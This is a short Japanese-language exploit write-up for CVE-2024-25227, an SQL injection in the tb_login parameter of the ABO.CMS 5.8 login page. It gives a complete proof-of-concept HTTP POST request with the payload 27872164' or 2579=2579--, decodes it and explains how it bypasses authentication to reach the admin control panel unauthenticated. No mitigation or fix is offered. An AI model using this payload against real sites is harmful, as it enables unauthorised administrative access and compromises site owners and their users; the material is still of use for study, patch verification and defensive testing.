
ABO.CMS 5.8のSQLインジェクション脆弱性を利用し、tb_loginパラメータを介して認証をバイパスし、未認証で管理パネルにアクセスできるエクスプロイトです。PoCのHTTPリクエストとペイロードを含みます。
CVE-2024-25227 エクスプロイト
CVE-2024-25227は、ABO.CMS 5.8のSQLi脆弱性であり、パラメータ「tb_login」に見られます。
POST /login.aspx HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/535.36 (KHTML, like Gecko) Chrome/104.0.5735.134 Safari/527.36
Connection: close
Cache-Control: max-age=0
Cookie: ASP.NET_SessionId=asd123hstjj
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Referer: http://ip
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
VIEWSTATE=%2ASDkjdkjfkgajsslfk&EVENTVALIDATION=%2;llkfopkorjaeitjru123&tb_login=27872164'%20or%202579%3d2579--%20&tb_pwd=hf%36nb4u%84X5&b_submit=+%C3+%D7+%CE+%C5+
ペイロードは tb_login=27872164'%20or%202579%3d2579--%20 です。URLエンコードを解除すると次のようになります: 27872164' or 2579=2579--
ペイロードを含む修正リクエストにより、バックエンドに対して、プレースホルダー 「27872164'」 が常に真と評価される条件 ("2579=2579") と結合され、クエリ内の残りの部分を "--" でコメントアウトして、修正されたクエリが注入されるように指示しています。 これにより、「tb_login」フィールドに関連するすべての認証チェックが効果的にバイパスされ、adminとしてコントロールパネルに認証なしでアクセスできるようになります。